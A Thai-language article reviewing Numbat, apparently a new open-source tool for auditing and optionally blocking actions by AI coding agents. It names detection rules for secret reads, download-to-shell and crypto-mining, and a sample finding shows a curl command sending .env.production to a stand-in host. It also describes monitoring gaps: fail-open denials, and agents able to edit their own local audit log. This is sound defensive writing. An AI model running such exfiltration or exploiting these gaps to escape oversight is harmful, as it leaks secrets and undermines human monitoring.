วิธีตรวจสอบการทำงานของ AI Agent ด้วยเครื่องมือ Numbat
Perplexity เปิดตัว Numbat เครื่องมือโอเพนซอร์สสำหรับตรวจสอบพฤติกรรมของ AI coding agents บนเซิร์ฟเวอร์ ช่วยบันทึกคำสั่งและกิจกรรมที่เกิดขึ้นจริงเพื่อป้องกันความเสี่ยงด้านความปลอดภัย
Numbat คืออะไร
Numbat ช่วยให้คุณมองเห็นการทำงานของ AI agent บนเครื่องที่คุณเป็นเจ้าของ โดยระบบจะอ่าน hook callbacks และไฟล์ session ที่ coding agents สร้างขึ้นอยู่แล้ว จากนั้นจะปรับรูปแบบข้อมูลให้เป็นมาตรฐานเดียวกัน และตรวจสอบเทียบกับกฎที่กำหนดไว้ ซึ่งจะแจ้งเตือนเมื่อพบพฤติกรรมที่น่าสงสัย เช่น การอ่านไฟล์ SSH private key หรือการส่งข้อมูลที่ดาวน์โหลดมาเข้าสู่ shell โดยตรง Perplexity ได้เปิดตัวเครื่องมือนี้เป็นโอเพนซอร์สภายใต้สัญญาอนุญาต Apache 2.0 โดยมีการปล่อย release แรกเมื่อวันที่ 29 กรกฎาคม 2026
เนื้อหาทั้งหมดด้านล่างนี้อ้างอิงจาก repository และเอกสารประกอบของโครงการ ซึ่งอ่านเมื่อวันที่ 2 สิงหาคม 2026 ในกรณีที่ Perplexity มีการกล่าวอ้างใดๆ บทความนี้จะระบุไว้ตามนั้น ทั้งนี้ เนื้อหาดังกล่าวไม่ใช่คู่มือการติดตั้ง เนื่องจาก repository เพิ่งเปิดตัวได้ไม่กี่วันและคำสั่งต่างๆ อาจมีการเปลี่ยนแปลงได้ในอนาคต
ปัญหาคือไม่มีใครบันทึกสิ่งที่เอเจนต์ได้ทำลงไป
Coding agent บน VPS ของคุณจะรันคำสั่งเชลล์ อ่านไฟล์ เขียนไฟล์ และเปิดการเชื่อมต่อเครือข่าย โดยใช้สิทธิ์ของผู้ใช้ที่คุณกำหนดให้ ประวัติการใช้งานเชลล์ (shell history) ของคุณจะไม่บันทึกสิ่งเหล่านี้ไว้ เพราะเอเจนต์ไม่ได้พิมพ์คำสั่งผ่านเชลล์ของคุณ sshd จะบันทึกเพียงการล็อกอินของคุณเท่านั้น และไม่บันทึกสิ่งที่โมเดลตัดสินใจทำหลังจากนั้น /var/log/auth.log จะไม่แสดงข้อมูลใดๆ เว้นแต่จะมีบางอย่างพยายามเข้าถึง sudo แม้ว่าเอเจนต์จะเก็บทรานสคริปต์ของตัวเองไว้ แต่ไฟล์ดังกล่าวจะอยู่ในไดเรกทอรีเซสชันของเอเจนต์ ซึ่งรูปแบบไฟล์อาจเปลี่ยนแปลงไปตามแต่ละ releases และตัวกระบวนการของเอเจนต์เองก็สามารถเขียนทับไฟล์นั้นได้
ดังนั้น เมื่อมีคนถามว่าเอเจนต์ได้อ่านไฟล์ .env.production เมื่อวันอังคารที่ผ่านมาหรือไม่ คำตอบตามความเป็นจริงบนเซิร์ฟเวอร์ส่วนใหญ่คือคุณไม่สามารถตรวจสอบได้ ช่องว่างนี้คือเหตุผลที่โครงการนี้ถูกสร้างขึ้น
สิ่งที่ Perplexity กล่าวอ้างว่า Numbat ทำได้
README เริ่มต้นด้วยการอธิบายเครื่องมือนี้ว่าเป็น "การมองเห็นกิจกรรมของ AI agent ในระดับ endpoint พร้อมการตรวจจับภายในเครื่อง, การบล็อกก่อนดำเนินการ (ทางเลือก) และการสร้างเหตุการณ์ย้อนหลังเพื่อการพิสูจน์หลักฐาน" คำว่า endpoint ในที่นี้หมายถึงเครื่องที่ agent ทำงานอยู่ ไม่ใช่อุปกรณ์เครือข่ายที่คอยเฝ้าดูจากภายนอก ซึ่งความสามารถเหล่านี้แยกจากกันและมีน้ำหนักความสำคัญที่แตกต่างกัน
การตรวจจับจะทำงานบนอุปกรณ์ กฎต่างๆ เขียนด้วย CEL (common expression language) และประมวลผลภายในเครื่อง โดยมีกฎลำดับขั้นตอนหลายขั้นรองรับ และรองรับการเขียนกฎของคุณเองในรูปแบบ YAML ข้อมูลไม่จำเป็นต้องออกจากเครื่องเพื่อให้กฎทำงาน
การบล็อกเป็นทางเลือกและมีขอบเขตจำกัด โดยทำงานผ่าน synchronous pre-action hooks บน agent ที่รองรับเท่านั้น และจะถูกปิดไว้จนกว่าคุณจะเปิดใช้งาน
การสร้างเหตุการณ์ย้อนหลังเกิดขึ้นหลังจากเหตุการณ์ผ่านไปแล้ว numbat scan จะวิเคราะห์ session artifacts ที่ agent เขียนลงดิสก์ไว้ก่อนหน้า เพื่อให้คุณตรวจสอบกิจกรรมที่เกิดขึ้นก่อนการติดตั้งเครื่องมือนี้ได้ โครงการนี้ระบุขอบเขตของคำกล่าวอ้างไว้อย่างชัดเจนว่า: "การสร้างเหตุการณ์ย้อนหลังจากข้อมูลที่จัดเก็บไว้ (at-rest) ไม่ใช่การดึงข้อมูลจากดิสก์หรือหน่วยความจำ และไม่สามารถกู้คืนกิจกรรมที่ agent ไม่ได้บันทึกไว้ได้"
ผลลัพธ์ที่ได้คือ NDJSON (newline delimited JSON) ที่มีการระบุเวอร์ชัน ครอบคลุมเหตุการณ์, สิ่งที่ตรวจพบ, การตัดสินใจบังคับใช้, ตัวบ่งชี้ และสรุปการสแกน โดยใช้ schema เวอร์ชัน 0.2.0 ณ เวอร์ชัน 0.1.2 ข้อมูลจะถูกส่งออกไปยัง stdout หรือไฟล์ในเครื่อง และสามารถส่งผ่าน HTTP ไปยัง collector ที่คุณรันไว้ได้ ตัวซอฟต์แวร์จัดส่งในรูปแบบ static Go binary ไฟล์เดียวที่คอมไพล์โดยไม่ใช้ cgo สำหรับ macOS, Linux และ Windows บนสถาปัตยกรรม amd64 และ arm64 ดังนั้นบน Linux VPS จึงเป็นเพียงไฟล์เดียวโดยไม่ต้องติดตั้ง runtime ใดๆ เพิ่มเติมก่อนใช้งาน
Numbat สามารถมองเห็นเอเจนต์ใดได้บ้าง
ตารางการครอบคลุมใน docs/agent-coverage.md คือรายการอ้างอิงหลัก ซึ่งมีความครอบคลุมไม่เท่ากันในแต่ละรายการ โครงการระบุเรื่องนี้ไว้อย่างชัดเจนแทนที่จะปกปิดไว้ โดย Claude Code, Codex, Gemini CLI, Cursor และ GitHub Copilot CLI รองรับทั้งการสแกนอาร์ติแฟกต์และการดักจับข้อมูลแบบสดผ่าน pre-action hook ส่วน OpenClaw จะได้รับปลั๊กอินแบบเนทีฟตั้งแต่เวอร์ชัน 2026.7.1 เป็นต้นไป รายการจำนวนมากถูกระบุสถานะเป็น deferred ซึ่งหมายความว่ามีเส้นทางสำหรับ live hook แต่ยังไม่มีตัวแยกวิเคราะห์อาร์ติแฟกต์ (artifact parser) มักเป็นเพราะเอเจนต์เหล่านั้นจัดเก็บประวัติในรูปแบบ SQLite ที่มี write-ahead log ซึ่งไม่ปลอดภัยที่จะอ่านในขณะที่เอเจนต์กำลังทำงานอยู่ โดย OpenCode และ Cline ยังคงอยู่ในกลุ่มนี้ ณ วันที่อ่านข้อมูลจากตารางเมื่อวันที่ 2 สิงหาคม 2026
โปรดตรวจสอบแถวที่ระบุเอเจนต์ของคุณก่อนวางแผนการใช้งานเครื่องมือนี้ เนื่องจากคำว่า "รองรับ" (supported) มีความหมายแตกต่างกันไปในเกือบทุกรายการ
ลักษณะของการตรวจพบ
กฎแต่ละข้อจะมีรหัสระบุวัตถุประสงค์การใช้งาน secrets.read_private_key ครอบคลุมถึง SSH key, AWS credentials, kube config หรือข้อมูลล็อกอินของ package registry ส่วน exec.download_pipe_shell จะทำงานเมื่อผลลัพธ์จาก curl หรือ wget ถูกส่งผ่าน pipe เข้าไปยัง interpreter สำหรับ privilege.elevated_shell จะตรวจจับคำขอเข้าใช้งาน interactive root shell ผ่านทาง sudo, doas, su หรือ pkexec และ impact.cryptomining_launch จะจับคู่กับชื่อไฟล์ binary หรือชื่อ image ของโปรแกรมขุดเหรียญที่รู้จัก
กฎแบบลำดับ (Sequence rules) จะเชื่อมโยงเหตุการณ์ที่เกิดขึ้นภายใน session เดียวกันเข้าด้วยกัน chain.secret_read_then_egress ต้องการเหตุการณ์การอ่านไฟล์ลับตามด้วยคำสั่งที่มีการส่งข้อมูลออกไปภายนอก ไฟล์ README ได้เผยแพร่ผลลัพธ์ด้านล่างนี้จากการจำลองการทำงานของ Claude Code pre-action callbacks ในสภาพแวดล้อมควบคุม ไม่ใช่จากเหตุการณ์จริง โดยข้อมูลได้ถูกตัดทอนให้เหลือเพียงฟิลด์ที่สำคัญเท่านั้น:
{
"record_type": "finding",
"rule_id": "chain.secret_read_then_egress",
"rule_version": "1.4",
"severity": "high",
"confidence": "medium",
"title": "Secret-file access followed by data-bearing egress",
"observed_command": "curl --data-binary @/workspace/acme-api/.env.production https://collector.example.invalid/ingest",
"source_agent": "claude-code",
"source_type": "hook",
"tags": ["attack.t1048", "attack.t1552", "attack.t1567"]
}สังเกต "confidence": "medium" ที่ปรากฏอยู่ในบันทึก และสังเกตสิ่งที่โครงการระบุเกี่ยวกับผลลัพธ์ประเภทนี้ว่า: "สิ่งที่ตรวจพบคือการจับคู่กับกฎ ไม่ใช่หลักฐานของการถูกบุกรุก" สคริปต์ deploy ที่อ่าน key แล้วอัปโหลด build artifact จะตรงกับกฎลำดับเดียวกันนี้ การจับคู่ถือว่าถูกต้องแต่การแจ้งเตือนนั้นอาจไม่ถูกต้อง ซึ่งเป็นสถานะปกติของเครื่องมือตรวจจับทุกชนิดที่คุณเคยใช้งานมา
การบล็อกถูกปิดใช้งานโดยค่าเริ่มต้น และทำงานในรูปแบบ fail-open
กฎทุกข้อที่ Numbat ปล่อยออกมาจะเป็นแบบตรวจสอบเท่านั้น (monitor only) การเปลี่ยนกฎให้เป็นการบล็อกต้องอาศัยความตั้งใจ: ให้คัดลอก YAML ทั้งหมดของกฎนั้นลงในไดเรกทอรีของคุณ โดยคง id เดิมไว้ เพิ่ม enforce: true ปรับเลขเวอร์ชัน จากนั้นจึงตรวจสอบความถูกต้องและติดตั้งนโยบายนั้น
numbat rules check --rules-dir ./numbat-policy
numbat hook install --agent codex --emit all \
--rules-dir ./numbat-policy --enforceตอนนี้มาถึงส่วนที่ตัดสินว่าคุณควรเชื่อถือมันมากน้อยเพียงใด การปฏิเสธ (deny) ของ Numbat คือการตอบสนองที่ส่งกลับไปยัง agent และตัว agent เองคือสิ่งที่ปฏิเสธการเรียกใช้เครื่องมือ (tool call) จริงๆ คู่มือการบังคับใช้ระบุไว้อย่างชัดเจนเกี่ยวกับสิ่งที่เกิดขึ้นเมื่อ Numbat ประสบปัญหา: "payload ที่ผิดรูปแบบ, ข้อผิดพลาดในการประเมินที่เกี่ยวข้อง, อาการ panic และความล้มเหลวของ output จะทำให้การปฏิเสธของ numbat ถูกระงับไว้" ข้อมูลขาเข้าของ hook ถูกจำกัดไว้ที่ 4 MiB และข้อมูลที่มีขนาดใหญ่เกินไปจะถูกจัดการในลักษณะเดียวกัน
คู่มือยังระบุไว้อย่างชัดเจนเกี่ยวกับขีดจำกัดของการปฏิเสธที่เกิดขึ้นจริง: "Fail-open หมายความว่า numbat จะระงับการตอบสนองแบบปฏิเสธของตนไว้ ซึ่งไม่ได้เป็นการรับประกันว่าเครื่องมือจะทำงาน: โฮสต์อาจยังคงแจ้งเตือน, ปฏิเสธ, หมดเวลา หรือใช้ hook หรือนโยบายอื่นบังคับใช้แทน"
ดังนั้นการบังคับใช้ในที่นี้จึงเป็นเพียงเครื่องป้องกัน ไม่ใช่ขอบเขตที่เด็ดขาด หากกระบวนการทำงานขัดข้อง การกระทำนั้นจะไม่ถูกบล็อกโดย Numbat เพราะเครื่องมือตรวจสอบที่ทำให้ agent ของคุณค้างทุกครั้งที่มีปัญหาจะถูกถอนการติดตั้งภายในหนึ่งสัปดาห์ ข้อแลกเปลี่ยนนี้ถือว่าสมเหตุสมผล เพียงแต่อย่าสร้างโมเดลความปลอดภัยที่ตั้งสมมติฐานว่าการปฏิเสธจะมาถึงเสมอไป
ตำแหน่งของ Numbat ในระบบที่คุณใช้งานอยู่
Numbat ทำงานบน endpoint ภายใน process tree ของตัว agent เอง และเขียนข้อมูลลงใน ~/.numbat/records.ndjson เป็นค่าเริ่มต้น Agent ที่รันด้วยสิทธิ์ผู้ใช้ของคุณสามารถอ่านไฟล์ดังกล่าวได้ และยังสามารถแก้ไขไฟล์นั้นได้ด้วย ความน่าเชื่อถือของ audit trail ขึ้นอยู่กับการแยกส่วน (isolation) รอบตัวมันโดยตรง ซึ่งทำให้การควบคุมทุกอย่างที่คุณมีอยู่แล้วต้องถูกนำมาใช้ก่อนหน้าการควบคุมนี้ ไม่ใช่ตามหลัง
การให้ coding agent ใช้ VM แบบใช้แล้วทิ้ง ช่วยจำกัดขอบเขตสิ่งที่การทำงานที่ผิดพลาดจะเข้าถึงได้ การใช้ผู้ใช้ที่มีสิทธิ์น้อยที่สุด (least privilege) บน VPS ช่วยป้องกันไม่ให้ agent เข้าถึงไฟล์ที่ไม่เกี่ยวข้อง การไม่เก็บ credential ไว้ในบริบทของ agent คือสิ่งที่ทำให้การตรวจพบ secrets.read_private_key มีความถี่น้อยพอที่จะคุ้มค่าต่อการตรวจสอบเมื่อมีการแจ้งเตือน และ sandbox ที่คุณตั้งค่าไว้สำหรับ Claude Code บน VPS ยังคงเป็นกลไกหลักในการควบคุมความเสียหาย การควบคุมช่วยจำกัดสิ่งที่การทำงานที่ผิดพลาดจะแตะต้องได้ ในขณะที่ การจดบันทึกเหตุผลเบื้องหลังโครงสร้างของโค้ด ช่วยลดโอกาสที่ agent จะทำสิ่งที่คาดไม่ถึงจนคุณต้องไปตรวจสอบ log
สิ่งที่ Numbat เพิ่มเข้ามาคือบันทึกเหตุการณ์ ดังนั้นควรส่งบันทึกไปยังที่ที่ agent เข้าไม่ถึง numbat ship และ HTTP sink มีไว้เพื่อการนี้ การสำเนา stream ไปยังเครื่องที่สองคือความแตกต่างระหว่างไฟล์ log ทั่วไปกับหลักฐานที่เชื่อถือได้ รูปแบบเหตุการณ์ยังรองรับฟิลด์ของ MCP (model context protocol) ดังนั้นการเรียกใช้เครื่องมือที่ผ่าน MCP server ที่คุณโฮสต์บน VPS จะถูกบันทึกลงใน stream เดียวกับคำสั่ง shell ในเครื่อง ซึ่งเป็นเรื่องสำคัญเพราะเส้นทางนั้นจะมองไม่เห็นสำหรับสิ่งที่เฝ้าดูเพียง bash เท่านั้น จุดบอดเดียวกันนี้ยังครอบคลุมถึง การเชื่อมต่อ SearXNG instance เข้าเป็น search backend ของ agent ซึ่งความเสี่ยงจะมาในรูปแบบของข้อความจากหน้าเว็บที่ไม่น่าเชื่อถือที่ถูกส่งเข้าสู่บริบทของโมเดล แทนที่จะเป็นคำสั่งที่กฎใดๆ จะตรวจจับได้
ลองใช้งานในโหมดอ่านอย่างเดียว (read-only) ก่อน
ติดตั้งเวอร์ชันที่ระบุไว้ (pinned version) จำเป็นต้องใช้ Go 1.26.5 หรือใหม่กว่าสำหรับ go install และในหน้า releases มีไฟล์ binary ที่คอมไพล์ไว้ล่วงหน้าพร้อมค่า SHA-256 checksum ให้เลือกใช้ หากคุณไม่ต้องการคอมไพล์จากซอร์สโค้ด
go install github.com/perplexityai/numbat/cmd/numbat@v0.1.2
numbat agents
numbat scannumbat agents จะตรวจหาเอเจนต์ที่ติดตั้งอยู่บนเครื่อง numbat scan จะทำการแยกวิเคราะห์ (parse) อาร์ทิแฟกต์ของเซสชันที่มีอยู่บนดิสก์แล้วแสดงผลบันทึกออกมา ไฟล์ README ระบุว่าคำสั่งเหล่านี้ "ไม่ได้ติดตั้ง hook หรือเปลี่ยนแปลงการตั้งค่าของเอเจนต์" และ numbat "ไม่เคยรันเอเจนต์หรือคำสั่งที่พบในอาร์ทิแฟกต์ และจะส่งคำขอออกไปยัง HTTP sinks ที่กำหนดค่าไว้เท่านั้น" การสแกนจะเป็นแบบอ่านอย่างเดียวพร้อมการปกปิดข้อมูลลับ (secret redaction) และการแสดงผลบันทึกตามปกติจะไม่รวมถึงข้อมูลดิบ (raw transcript) ทั้งหมด
การดักจับข้อมูลแบบสด (live capture) คือขั้นตอนถัดไป ซึ่งจะมีการเปลี่ยนแปลงการตั้งค่าของเอเจนต์:
numbat hook install --agent codex --emit all
numbat hook status --agent codex--emit all จะเขียนเหตุการณ์, ข้อค้นพบ, ตัวบ่งชี้ และการตัดสินใจบังคับใช้ที่เกี่ยวข้องลงใน ~/.numbat/records.ndjson มีข้อควรระวังสองประการจากโปรเจกต์โดยตรง ประการแรก hook อาจต้องได้รับความเชื่อถือภายในเอเจนต์ก่อนจึงจะทำงานได้ และความเชื่อถือนี้จะต้องได้รับการตรวจสอบอีกครั้งหลังจากที่คุณเปลี่ยนแฟล็ก เช่น --enforce ประการที่สอง hook status "ตรวจสอบการตั้งค่า ไม่ใช่การทำงานหรือการส่งข้อมูล" ดังนั้นบรรทัดสถานะที่แสดงว่าปกติ (healthy) จึงไม่ใช่หลักฐานยืนยันว่าบันทึกข้อมูลกำลังถูกส่งไปยังปลายทางใดๆ
เหตุใด repository ที่เพิ่งเปิดตัวจึงยังไม่ควรเป็น dependency
การปล่อยซอฟต์แวร์สู่สาธารณะคือ v0.1.1 เมื่อวันที่ 29 กรกฎาคม 2026 และ v0.1.2 เมื่อวันที่ 1 สิงหาคม 2026 โดย repository นี้มีจำนวนดาว 597 ดวง ณ เวลาที่เขียนบทความนี้ในวันที่ 2 สิงหาคม 2026 ตัวเลขที่เพิ่มขึ้นอย่างรวดเร็วเช่นนี้สะท้อนถึงกลุ่มผู้ใช้งานของ Perplexity ไม่ใช่ความเสถียรของโค้ด การกดดาวหมายถึงมีคนบันทึกหน้านี้ไว้เพื่อกลับมาดูในภายหลังเท่านั้น
หมายเลขเวอร์ชันบ่งบอกสถานะปัจจุบันของซอฟต์แวร์ได้อย่างตรงไปตรงมา บันทึกของ v0.1.2 ส่วนใหญ่เป็นการแก้ไขเรื่องการปกปิดข้อมูลรับรอง (credential redaction) รวมถึงการจัดการ case bundle และการปรับมาตรฐาน telemetry ข้อผิดพลาดในการปกปิดข้อมูลเป็นสิ่งที่คาดการณ์ได้สำหรับเครื่องมือในระยะเริ่มต้นที่มีหน้าที่อ่าน transcript ของโปรแกรมอื่นอย่างปลอดภัย และจะมีข้อผิดพลาดลักษณะนี้เกิดขึ้นอีก เนื่องจากข้อมูลขาเข้ามาจาก agent จำนวนมากที่ต่างฝ่ายต่างเปลี่ยนรูปแบบข้อมูลตามกำหนดการของตนเอง
กฎในทางปฏิบัติมี 2 ข้อ ดังนี้ ให้ระบุเวอร์ชันแบบเจาะจง (pin the tag) ห้ามใช้ @latest ในสิ่งที่คุณเก็บรักษาไว้ และให้ถือว่าซอฟต์แวร์นี้เป็นเครื่องมือที่คุณกำลังประเมินผล ไม่ใช่ระบบควบคุมที่คุณต้องพึ่งพา จนกว่าโครงสร้างข้อมูล (schema) จะมีความนิ่งคงที่
FAQ
Numbat บล็อกคำสั่ง AI agent ที่เป็นอันตรายหรือไม่?
บล็อกเฉพาะเมื่อคุณเลือกเปิดใช้งานเท่านั้น และเป็นการดำเนินการแบบ best effort กฎทุกข้อที่ Numbat จัดส่งมาจะเป็นโหมด monitor เท่านั้น หากต้องการบล็อก คุณต้องคัดลอก YAML ของกฎนั้นไปยังไดเรกทอรีของคุณเอง คงค่า id เดิมไว้ เพิ่ม enforce: true ปรับเวอร์ชันให้สูงขึ้น และติดตั้ง hook ด้วย --enforce แม้จะทำเช่นนั้น การปฏิเสธ (deny) ก็เป็นเพียงการตอบกลับที่ส่งไปยัง agent และตัว agent เองจะเป็นผู้ปฏิเสธการเรียกนั้น โครงการนี้ระบุพฤติกรรมแบบ fail-open ไว้ชัดเจน: payload ที่ผิดรูปแบบ, ข้อผิดพลาดในการประเมิน, อาการ panic และความล้มเหลวในการส่งออกข้อมูล ทั้งหมดนี้จะทำให้การบล็อกถูกระงับไป ให้ใช้เครื่องมือนี้เป็นเพียงแนวป้องกันเสริม ไม่ใช่ขอบเขตความปลอดภัยเพียงชั้นเดียวของคุณ
Numbat รองรับ AI agent ตัวใดบ้าง?
ระดับการรองรับจะแตกต่างกันไปในแต่ละ agent ซึ่งระบุไว้ใน docs/agent-coverage.md ภายใน repository ณ วันที่อ่านหน้านั้นเมื่อ 2 สิงหาคม 2026 พบว่า Claude Code, Codex, Gemini CLI, Cursor และ GitHub Copilot CLI มีทั้งการสแกน artifact และการบันทึกแบบสด ส่วน OpenClaw มีปลั๊กอินแบบ native ตั้งแต่เวอร์ชัน 2026.7.1 เป็นต้นไป agent อื่นๆ จำนวนมากถูกระบุว่ามี live hook path แต่ยังไม่มีตัวแยกวิเคราะห์ artifact ซึ่งมักเป็นเพราะประวัติเซสชันของ agent เหล่านั้นถูกเก็บไว้ในฐานข้อมูล SQLite ที่ไม่ปลอดภัยต่อการอ่านในขณะที่ agent กำลังทำงานอยู่ โปรดอ่านแถวที่ระบุถึง agent ของคุณ เพราะคำว่า "รองรับ" (supported) ในที่นี้ครอบคลุมระดับการทำงานที่แตกต่างกันหลายระดับ
agent สามารถแก้ไขบันทึกของ Numbat ได้หรือไม่?
ได้ หาก agent นั้นทำงานภายใต้ผู้ใช้คนเดียวกัน บันทึกจะถูกเก็บไว้ที่ ~/.numbat/records.ndjson บนเครื่องเดียวกับที่ agent ทำงาน ดังนั้นทุกสิ่งที่สามารถเขียนไฟล์ใน path นั้นได้ย่อมสามารถแก้ไขหรือลบข้อมูลได้ ให้ส่งสตรีมข้อมูลไปยังตัวรวบรวม (collector) ที่ agent เข้าไม่ถึงด้วย numbat ship หรือ HTTP sink และเก็บไฟล์ในเครื่องไว้เป็นเพียงสำเนาเพื่อความสะดวก นี่คือเหตุผลที่เครื่องมือนี้ช่วยเสริมการแยกส่วน (isolation) แทนที่จะมาแทนที่ การที่ agent ถูกจำกัดอยู่ใน VM แบบใช้แล้วทิ้งภายใต้ผู้ใช้ที่มีสิทธิ์น้อยที่สุด (least privilege) จะช่วยลดขอบเขตที่ agent จะเข้าถึง audit trail ของตัวเองได้มาก
Numbat พร้อมสำหรับเซิร์ฟเวอร์ระดับ production หรือยัง?
ยังไม่พร้อมในฐานะเครื่องมือควบคุมที่คุณต้องพึ่งพา การเผยแพร่สู่สาธารณะครั้งแรกคือ v0.1.1 เมื่อ 29 กรกฎาคม 2026 และตามมาด้วย v0.1.2 เมื่อ 1 สิงหาคม 2026 ดังนั้นทั้ง flag และ schema ของบันทึกจึงยังมีการเปลี่ยนแปลงอยู่ การรัน numbat agents และ numbat scan บนเครื่องจะเป็นแบบ read-only และมีความเสี่ยงต่ำ ซึ่งจะช่วยให้คุณทราบว่า agent ของคุณทิ้งอะไรไว้บนดิสก์บ้าง การติดตั้ง enforcement hook บนเซิร์ฟเวอร์ที่มีความสำคัญเป็นการตัดสินใจที่ต่างออกไป และควรใช้ pinned tag พร้อมแผนรองรับกรณีที่ hook ทำงานผิดพลาด